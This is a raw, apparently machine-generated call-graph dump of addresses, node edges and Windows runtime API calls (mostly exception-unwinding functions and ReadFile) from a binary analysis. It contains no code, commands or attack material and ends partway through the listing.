7ff8a8834711 111744->111745 111744->111747 111874 7ff8a882cc30 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111744->111874 111745->111747 111751 7ff8a883480a 111745->111751 111752 7ff8a883472e 111745->111752 111747->111715 111898 7ff8a881a920 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111747->111898 111748 7ff8a8834322 111863 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111748->111863 111760 7ff8a88347d1 111751->111760 111877 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111751->111877 111759 7ff8a87d5dc0 4 API calls 111752->111759 111753 7ff8a88346e4 111753->111747 111875 7ff8a882cc30 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111753->111875 111756 7ff8a88345e2 111756->111744 111763 7ff8a88345f9 111756->111763 111757 7ff8a8834590 111757->111745 111757->111747 111757->111756 111762 7ff8a88345c8 111757->111762 111758->111747 111866 7ff8a882ec80 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111758->111866 111766 7ff8a8834770 111759->111766 111760->111747 111847 7ff8a8833f80 111760->111847 111867 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111762->111867 111764 7ff8a883461c 111763->111764 111765 7ff8a8834605 111763->111765 111769 7ff8a8834647 111764->111769 111869 7ff8a88363d0 32 API calls 111764->111869 111868 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111765->111868 111876 7ff8a881ba30 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111766->111876 111870 7ff8a882ef70 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111769->111870 111773 7ff8a88348cf 111773->111747 111776 7ff8a883497c 111773->111776 111878 7ff8a88188d0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111773->111878 111778 7ff8a8834be4 111776->111778 111796 7ff8a8834c5b 111776->111796 111809 7ff8a8834bf3 111776->111809 111879 7ff8a88188d0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111776->111879 111880 7ff8a88377c0 7 API calls 111776->111880 111777 7ff8a8834c12 111777->111747 111883 7ff8a881c040 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111777->111883 111881 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111778->111881 111782 7ff8a8834e3f 111784 7ff8a8834e6b 111782->111784 111786 7ff8a8834fba 111782->111786 111782->111809 111783 7ff8a8834e9f 111884 7ff8a87db7a0 5 API calls new[] 111783->111884 111784->111783 111790 7ff8a8834f8a 111784->111790 111787 7ff8a8834ffb 111786->111787 111786->111809 111889 7ff8a87ffd60 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111786->111889 111787->111809 111890 7ff8a8836590 32 API calls 111787->111890 111788 7ff8a8834eb2 111788->111809 111885 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111788->111885 111887 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111790->111887 111792 7ff8a8835015 111891 7ff8a8800120 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111792->111891 111796->111782 111799 7ff8a8834f16 111796->111799 111798 7ff8a8835022 111892 7ff8a8800050 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111798->111892 111799->111809 111886 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111799->111886 111800 7ff8a8834f99 111888 7ff8a8890d00 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111800->111888 111804 7ff8a8835042 111805 7ff8a883509e 111804->111805 111806 7ff8a87d8c40 4 API calls 111804->111806 111893 7ff8a882d4d0 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111805->111893 111806->111805 111808 7ff8a88350d6 111808->111809 111894 7ff8a8833930 11 API calls 111808->111894 111809->111747 111809->111777 111882 7ff8a881a920 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111809->111882 111811 7ff8a88350fc 111895 7ff8a8830be0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111811->111895 111813 7ff8a8835108 111814 7ff8a87d8c40 4 API calls 111813->111814 111815 7ff8a883511a 111814->111815 111896 7ff8a8800980 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111815->111896 111817 7ff8a883512f 111897 7ff8a8800200 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111817->111897 111819->111695 111820->111698 111821->111704 111822->111711 111824 7ff8a883405c 111823->111824 111825 7ff8a8834085 111823->111825 111824->111825 112343 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111824->112343 111825->111695 111827 7ff8a88340be 111827->111695 111828->111695 111830 7ff8a8851559 111829->111830 111832 7ff8a8834179 111829->111832 111900 7ff8a8851470 111830->111900 111832->111723 111832->111747 111833->111728 111835 7ff8a882dd2c 111834->111835 111844 7ff8a882dd31 111834->111844 111836 7ff8a8851540 44 API calls 111835->111836 111836->111844 111837 7ff8a882de2a 111838 7ff8a882de70 111837->111838 111839 7ff8a882de86 111837->111839 111842 7ff8a882de2e 111837->111842 112314 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111838->112314 112315 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111839->112315 111842->111733 111842->111747 111842->111748 111844->111837 111844->111842 111846 7ff8a882de17 111844->111846 112312 7ff8a8869ec0 5 API calls new[] 111844->112312 111846->111837 112313 7ff8a886bcd0 5 API calls new[] 111846->112313 111848 7ff8a8833fcb 111847->111848 111849 7ff8a8833fd5 111847->111849 111850 7ff8a87d5dc0 4 API calls 111848->111850 111851 7ff8a87d56a0 new[] 4 API calls 111849->111851 111852 7ff8a8833fd3 111850->111852 111851->111852 111853 7ff8a883402d 111852->111853 111854 7ff8a8833fe5 00007FF8BFAB19C0 111852->111854 111853->111773 111854->111853 111856 7ff8a8835c7c 111855->111856 111860 7ff8a8835b89 111855->111860 111856->111722 111860->111856 112316 7ff8a881c040 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111860->112316 112317 7ff8a882e710 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111860->112317 112318 7ff8a88522f0 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111860->112318 112319 7ff8a881a920 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111860->112319 111862->111737 111863->111747 111864->111747 111865->111747 111866->111757 111867->111747 111868->111747 111869->111769 111870->111747 112320 7ff8a87d8b70 111871->112320 111874->111753 111875->111745 111876->111760 111877->111760 111878->111776 111879->111776 111880->111776 111881->111809 111882->111777 111883->111747 111884->111788 111885->111809 111886->111809 111887->111800 111888->111809 111889->111787 111890->111792 111891->111798 111892->111804 111893->111808 111894->111811 111895->111813 111896->111817 111897->111809 111898->111715 111899->111717 111901 7ff8a88514aa 111900->111901 111904 7ff8a88514b7 111900->111904 111906 7ff8a8850fb0 111901->111906 111903 7ff8a885150d 111903->111832 111904->111903 111905 7ff8a8850fb0 44 API calls 111904->111905 111905->111904 111936 7ff8a8850cb0 111906->111936 111908 7ff8a8851097 111912 7ff8a88fcad0 4 API calls 111908->111912 111909 7ff8a885106c 111909->111908 111918 7ff8a8851148 111909->111918 111921 7ff8a8851117 111909->111921 111967 7ff8a87f1fa0 111909->111967 111910 7ff8a885142f 112005 7ff8a882e260 6 API calls 111910->112005 111914 7ff8a885144f 111912->111914 111914->111904 111916 7ff8a88510e1 111917 7ff8a88510e7 111916->111917 111916->111918 111919 7ff8a87d5dc0 4 API calls 111917->111919 111917->111921 111920 7ff8a88511f8 111918->111920 111925 7ff8a88511b6 111918->111925 111919->111921 111922 7ff8a87d5dc0 4 API calls 111920->111922 111921->111908 111921->111910 112004 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111921->112004 111929 7ff8a88511db 111922->111929 111923 7ff8a8851317 111927 7ff8a87d8c40 4 API calls 111923->111927 111924 7ff8a88512d1 111926 7ff8a87d5dc0 4 API calls 111924->111926 111925->111923 111925->111924 111925->111929 111926->111929 111928 7ff8a885134f 111927->111928 111975 7ff8a8849a70 111928->111975 111929->111921 112003 7ff8a87f3300 29 API calls 111929->112003 111932 7ff8a885137b 111933 7ff8a88513a9 111932->111933 112001 7ff8a882b380 44 API calls 111932->112001 111933->111929 112002 7ff8a882e2f0 6 API calls 111933->112002 111937 7ff8a8850cd2 111936->111937 111958 7ff8a8850f63 111936->111958 111938 7ff8a8850cdb 111937->111938 111942 7ff8a8850cf3 111937->111942 112038 7ff8a8850ba0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111938->112038 111940 7ff8a8850ce6 111940->111909 111943 7ff8a8850d32 111942->111943 111948 7ff8a8850edd 111942->111948 111944 7ff8a8850d84 111943->111944 112039 7ff8a8850ba0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111943->112039 112006 7ff8a8851850 00007FF8BFAB19C0 111944->112006 111947 7ff8a8850df1 111949 7ff8a8850e36 111947->111949 111947->111958 111959 7ff8a8850e7c 111947->111959 111948->111958 112047 7ff8a8850ba0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111948->112047 112043 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111949->112043 111952 7ff8a8850de9 112040 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111952->112040 111953 7ff8a8850df3 111953->111947 112041 7ff8a888f130 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111953->112041 111954 7ff8a8850e45 112044 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111954->112044 111958->111909 112045 7ff8a8803930 37 API calls 111959->112045 111961 7ff8a8850e6d 111961->111909 111962 7ff8a8850e04 112042 7ff8a8850ba0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111962->112042 111964 7ff8a8850ea8 112046 7ff8a888d880 29 API calls 111964->112046 111966 7ff8a8850ece 111966->111909 111968 7ff8a87f1fd7 111967->111968 111970 7ff8a87f2039 111968->111970 111974 7ff8a87f21f5 111968->111974 112093 7ff8a87f1b80 111968->112093 112107 7ff8a87f1ed0 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111968->112107 112108 7ff8a87e6150 22 API calls 111968->112108 111970->111916 111974->111970 112109 7ff8a87ea2f0 6 API calls new[] 111974->112109 111976 7ff8a8849aa6 111975->111976 111977 7ff8a8849a9d 111975->111977 111976->111977 111999 7ff8a8849b10 111976->111999 112248 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111977->112248 111979 7ff8a8849ad5 112249 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111979->112249 111981 7ff8a8849aff 111981->111932 111983 7ff8a8849f3d 111988 7ff8a8849fe5 111983->111988 112256 7ff8a888f130 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111983->112256 111984 7ff8a8849f1a 111984->111983 112253 7ff8a8803930 37 API calls 111984->112253 111988->111932 111990 7ff8a8849fdd 111990->111988 111992 7ff8a87d56a0 new[] 4 API calls 111990->111992 111991 7ff8a87d5dc0 4 API calls 111991->111999 111992->111988 111993 7ff8a8849f76 111993->111984 112255 7ff8a8803930 37 API calls 111993->112255 111997 7ff8a8849f64 112254 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111997->112254 111999->111984 111999->111991 111999->111993 111999->111997 112000 7ff8a8850cb0 44 API calls 111999->112000 112213 7ff8a8851df0 111999->112213 112225 7ff8a8806b10 111999->112225 112250 7ff8a8807de0 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111999->112250 112251 7ff8a87ff460 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111999->112251 112252 7ff8a8803930 37 API calls 111999->112252 112000->111999 112001->111933 112002->111929 112003->111921 112004->111910 112005->111908 112007 7ff8a885192b 112006->112007 112022 7ff8a8851949 112006->112022 112066 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112007->112066 112009 7ff8a8851afd 112048 7ff8a888b410 112009->112048 112011 7ff8a8851a6d 112015 7ff8a8851a9e 112011->112015 112016 7ff8a8851a76 112011->112016 112012 7ff8a8851a37 112012->112009 112012->112011 112014 7ff8a8851dc6 112017 7ff8a88fcad0 4 API calls 112014->112017 112021 7ff8a87d5dc0 4 API calls 112015->112021 112023 7ff8a8851ad6 112015->112023 112068 7ff8a87d9bc0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112016->112068 112019 7ff8a8850dc0 112017->112019 112019->111947 112019->111952 112019->111953 112020 7ff8a885193c 112074 7ff8a88515a0 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112020->112074 112024 7ff8a8851aaf 112021->112024 112022->112012 112027 7ff8a8851a12 112022->112027 112025 7ff8a87d5dc0 4 API calls 112023->112025 112037 7ff8a8851b5f 112023->112037 112024->112023 112030 7ff8a888b410 5 API calls 112024->112030 112025->112037 112026 7ff8a8851cee 112026->112020 112073 7ff8a87d9bc0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112026->112073 112067 7ff8a87d9bc0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112027->112067 112030->112023 112032 7ff8a8851b90 112032->112026 112072 7ff8a8803930 37 API calls 112032->112072 112033 7ff8a87f1fa0 32 API calls 112033->112037 112037->112020 112037->112032 112037->112033 112069 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112037->112069 112070 7ff8a882e260 6 API calls 112037->112070 112071 7ff8a87f3300 29 API calls 112037->112071 112038->111940 112039->111944 112040->111947 112041->111962 112042->111947 112043->111954 112044->111961 112045->111964 112046->111966 112047->111958 112050 7ff8a888b461 112048->112050 112051 7ff8a888b76e 112050->112051 112054 7ff8a888b824 112050->112054 112075 7ff8a888a840 112050->112075 112053 7ff8a888b899 112051->112053 112057 7ff8a87d8c40 4 API calls 112051->112057 112060 7ff8a888b87b 112051->112060 112056 7ff8a888b93a 112053->112056 112087 7ff8a882e710 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112053->112087 112085 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112054->112085 112065 7ff8a888b993 112056->112065 112088 7ff8a8861520 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112056->112088 112057->112060 112058 7ff8a88fcad0 4 API calls 112061 7ff8a888b9dc 112058->112061 112086 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112060->112086 112061->112023 112063 7ff8a888b961 112063->112065 112089 7ff8a881a920 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112063->112089 112065->112058 112066->112020 112067->112020 112068->112020 112069->112037 112070->112037 112071->112037 112072->112026 112073->112020 112074->112014 112078 7ff8a888a884 112075->112078 112076 7ff8a888a962 112084 7ff8a888a980 112076->112084 112090 7ff8a8887ae0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112076->112090 112077 7ff8a888a9a7 112079 7ff8a888a9db 112077->112079 112080 7ff8a888a9ee 112077->112080 112077->112084 112078->112076 112078->112077 112091 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112079->112091 112092 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112080->112092 112084->112050 112085->112051 112086->112053 112088->112063 112089->112065 112090->112084 112091->112084 112092->112084 112110 7ff8a87e8cf0 112093->112110 112096 7ff8a87f1d69 112105 7ff8a87f1cb4 112096->112105 112161 7ff8a87e6150 22 API calls 112096->112161 112098 7ff8a87f1ca4 112098->112096 112101 7ff8a87f1d47 112098->112101 112102 7ff8a87f1d1c 112098->112102 112098->112105 112101->112096 112160 7ff8a8890d00 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112101->112160 112159 7ff8a87e7800 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112102->112159 112105->111968 112107->111968 112109->111970 112111 7ff8a87e8fb9 112110->112111 112117 7ff8a87e8d20 112110->112117 112113 7ff8a87e905e 112111->112113 112178 7ff8a87ed550 8 API calls 112111->112178 112112 7ff8a87e8d85 112116 7ff8a88fcad0 4 API calls 112112->112116 112113->112112 112180 7ff8a87e5ba0 00007FF8BFAB19C0 112113->112180 112118 7ff8a87e90b9 112116->112118 112117->112111 112119 7ff8a87e8d8a 112117->112119 112125 7ff8a87e8d7d 112117->112125 112118->112105 112137 7ff8a87e90d0 112118->112137 112119->112113 112120 7ff8a87e8efa 112119->112120 112121 7ff8a87e8dc3 112119->112121 112132 7ff8a87e8dd5 112119->112132 112126 7ff8a87e8f1f 112120->112126 112162 7ff8a87dc960 112120->112162 112173 7ff8a87e5ba0 00007FF8BFAB19C0 112121->112173 112122 7ff8a87e901b 112122->112113 112122->112122 112179 7ff8a87e3220 00007FF8BFAB19C0 112122->112179 112172 7ff8a87e5ba0 00007FF8BFAB19C0 112125->112172 112126->112111 112126->112113 112177 7ff8a87eaa60 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112126->112177 112128 7ff8a87e8ec7 112128->112120 112130 7ff8a87e8ee6 112128->112130 112129 7ff8a87e8e84 112129->112128 112129->112130 112175 7ff8a87e69e0 9 API calls 112129->112175 112176 7ff8a87e5ba0 00007FF8BFAB19C0 112130->112176 112132->112113 112132->112129 112174 7ff8a8890d40 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112132->112174 112138 7ff8a87e9125 112137->112138 112139 7ff8a87e90f2 112137->112139 112183 7ff8a87e4020 112138->112183 112195 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112139->112195 112141 7ff8a87e911e 112141->112096 112141->112098 112141->112105 112158 7ff8a87eaa60 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112141->112158 112142 7ff8a87e92a6 112145 7ff8a87e92d4 112142->112145 112147 7ff8a87e92be 112142->112147 112143 7ff8a87e924e 112196 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112143->112196 112152 7ff8a87e92f0 112145->112152 112153 7ff8a87e91f8 112145->112153 112189 7ff8a87e6d90 112147->112189 112148 7ff8a87e932b 00007FF8BFAB19C0 112148->112141 112150 7ff8a87e9149 112150->112141 112150->112142 112150->112143 112150->112153 112151 7ff8a87e9313 112199 7ff8a87e5850 8 API calls new[] 112151->112199 112152->112148 112152->112151 112198 7ff8a87e2320 6 API calls new[] 112152->112198 112153->112141 112197 7ff8a87e6150 22 API calls 112153->112197 112156 7ff8a87e931d 112156->112148 112158->112098 112159->112105 112160->112096 112166 7ff8a87dc98d 112162->112166 112163 7ff8a87dca04 ReadFile 112165 7ff8a87dca9a 112163->112165 112163->112166 112164 7ff8a87dc9a4 112164->112126 112167 7ff8a87dcaca 112165->112167 112182 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112165->112182 112166->112163 112166->112164 112166->112165 112170 7ff8a87dca74 112166->112170 112167->112164 112169 7ff8a87dcad9 00007FF8BFAB19C0 112167->112169 112169->112164 112181 7ff8a87dc790 9 API calls 112170->112181 112172->112112 112173->112112 112174->112129 112175->112128 112176->112112 112177->112111 112178->112122 112179->112113 112180->112112 112181->112164 112182->112167 112184 7ff8a87e4077 112183->112184 112187 7ff8a87e40b3 112184->112187 112188 7ff8a87e409e 112184->112188 112209 7ff8a87e3970 5 API calls new[] 112184->112209 112187->112188 112200 7ff8a87e37a0 112187->112200 112188->112150 112190 7ff8a87e6dbf 112189->112190 112192 7ff8a87e6dcc 112189->112192 112212 7ff8a87ed930 6 API calls 112190->112212 112193 7ff8a87e6ddc 112192->112193 112194 7ff8a87dc960 11 API calls 112192->112194 112193->112153 112194->112193 112195->112141 112196->112153 112198->112151 112199->112156 112204 7ff8a87e38b9 112200->112204 112205 7ff8a87e37c8 112200->112205 112201 7ff8a87e38be 112211 7ff8a87e3510 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 112201->112211 112202 7ff8a87e38af 112210 7ff8a87e3510 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 112202->112210 112204->112188 112207 7ff8a87d56a0 new[] 4 API calls 112205->112207 112208 7ff8a87e3836 112205->112208 112207->112208 112208->112201 112208->112202 112208->112204 112209->112187 112210->112204 112211->112204 112212->112192 112214 7ff8a8851e7e 112213->112214 112215 7ff8a8851e28 112213->112215 112214->112215 112216 7ff8a8851ea0 112214->112216 112257 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112215->112257 112217 7ff8a8851e40 112216->112217 112223 7ff8a8851ea5 112216->112223 112258 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112217->112258 112220 7ff8a8851e6a 112220->111999 112221 7ff8a8851850 43 API calls 112221->112223 112222 7ff8a8851f9d 112222->111999 112223->112221 112223->112222 112259 7ff8a8837cb0 6 API calls 112223->112259 112226 7ff8a8806b3c 112225->112226 112227 7ff8a8806b2b 112225->112227 112229 7ff8a8806b52 112226->112229 112276 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112226->112276 112275 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112227->112275 112230 7ff8a8806b3a 112229->112230 112232 7ff8a8806b9c 112229->112232 112277 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112230->112277 112260 7ff8a8806880 112232->112260 112234 7ff8a8806b8a 112234->111999 112236 7ff8a8851df0 43 API calls 112246 7ff8a8806bc6 112236->112246 112237 7ff8a8806e90 112239 7ff8a8806e9d 112237->112239 112280 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112237->112280 112241 7ff8a8806ea9 112239->112241 112281 7ff8a87ff460 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112239->112281 112241->112241 112242 7ff8a87d5dc0 4 API calls 112241->112242 112244 7ff8a8806e8b 112241->112244 112242->112244 112244->111999 112246->112236 112246->112237 112246->112244 112247 7ff8a8806880 37 API calls 112246->112247 112278 7ff8a8803930 37 API calls 112246->112278 112279 7ff8a8805a20 37 API calls 112246->112279 112247->112246 112248->111979 112249->111981 112250->111999 112251->111999 112252->111999 112253->111983 112254->111984 112255->111984 112256->111990 112257->112217 112258->112220 112259->112223 112268 7ff8a880689d 112260->112268 112271 7ff8a88068f5 112260->112271 112261 7ff8a88068bc 112267 7ff8a88068c5 112261->112267 112261->112271 112262 7ff8a8806975 112282 7ff8a8809690 112262->112282 112263 7ff8a880696e 112303 7ff8a8801e00 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112263->112303 112274 7ff8a880698d 112267->112274 112302 7ff8a8803830 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112267->112302 112268->112261 112268->112271 112301 7ff8a8805a20 37 API calls 112268->112301 112270 7ff8a88068e6 112270->112246 112271->112262 112271->112263 112272 7ff8a8806973 112272->112274 112304 7ff8a8803830 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112272->112304 112274->112246 112275->112230 112276->112229 112277->112234 112278->112246 112279->112246 112280->112239 112281->112241 112283 7ff8a8809718 112282->112283 112286 7ff8a8809783 112283->112286 112305 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112283->112305 112285 7ff8a880ffbb 112306 7ff8a87ffec0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112285->112306 112286->112272 112288 7ff8a8810046 112308 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112288->112308 112289 7ff8a880ffca 112289->112272 112289->112288 112307 7ff8a87ffec0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112289->112307 112292 7ff8a8810098 112293 7ff8a88100aa 112292->112293 112309 7ff8a8803490 37 API calls 112292->112309 112296 7ff8a88100bb 112293->112296 112310 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112293->112310 112298 7ff8a880fb40 112296->112298 112311 7ff8a882e260 6 API calls 112296->112311 112298->112286 112299 7ff8a88fcad0 4 API calls 112298->112299 112300 7ff8a8810159 112299->112300 112300->112272 112301->112268 112302->112270 112303->112272 112304->112274 112305->112285 112306->112289 112307->112288 112308->112292 112309->112293 112310->112296 112311->112298 112312->111846 112313->111837 112314->111842 112315->111842 112316->111860 112318->111860 112319->111860 112329 7ff8a87d6400 112320->112329 112322 7ff8a87d8c0f 112325 7ff8a88fcad0 4 API calls 112322->112325 112326 7ff8a87d8c22 112325->112326 112326->111744 112328 7ff8a87d8bf6 112328->112322 112340 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112328->112340 112336 7ff8a87d6453 112329->112336 112330 7ff8a87d80a1 112331 7ff8a88fcad0 4 API calls 112330->112331 112332 7ff8a87d8143 112331->112332 112332->112328 112339 7ff8a87d8790 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 112332->112339 112334 7ff8a87d68a7 112334->112330 112342 7ff8a87d86c0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112334->112342 112336->112330 112336->112334 112336->112336 112337 7ff8a87d86c0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112336->112337 112338 7ff8a87d8220 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112336->112338 112341 7ff8a87d6350 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 112336->112341 112337->112336 112338->112336 112339->112328 112340->112322 112341->112336 112342->112330 112343->111827 112344 7ff8b7e56370 112345 7ff8b7e56383 112344->112345 112346 7ff8b7e53cc4 2 API calls 112345->112346 112347 7ff8b7e563a0 112345->112347 112346->112347 112348 7ff8b7e55830 112349 7ff8b7e55881 112348->112349 112351 7ff8b7e5588f 112349->112351 112352 7ff8b7e55784 112349->112352 112353 7ff8b7e5578d 112352->112353 112354 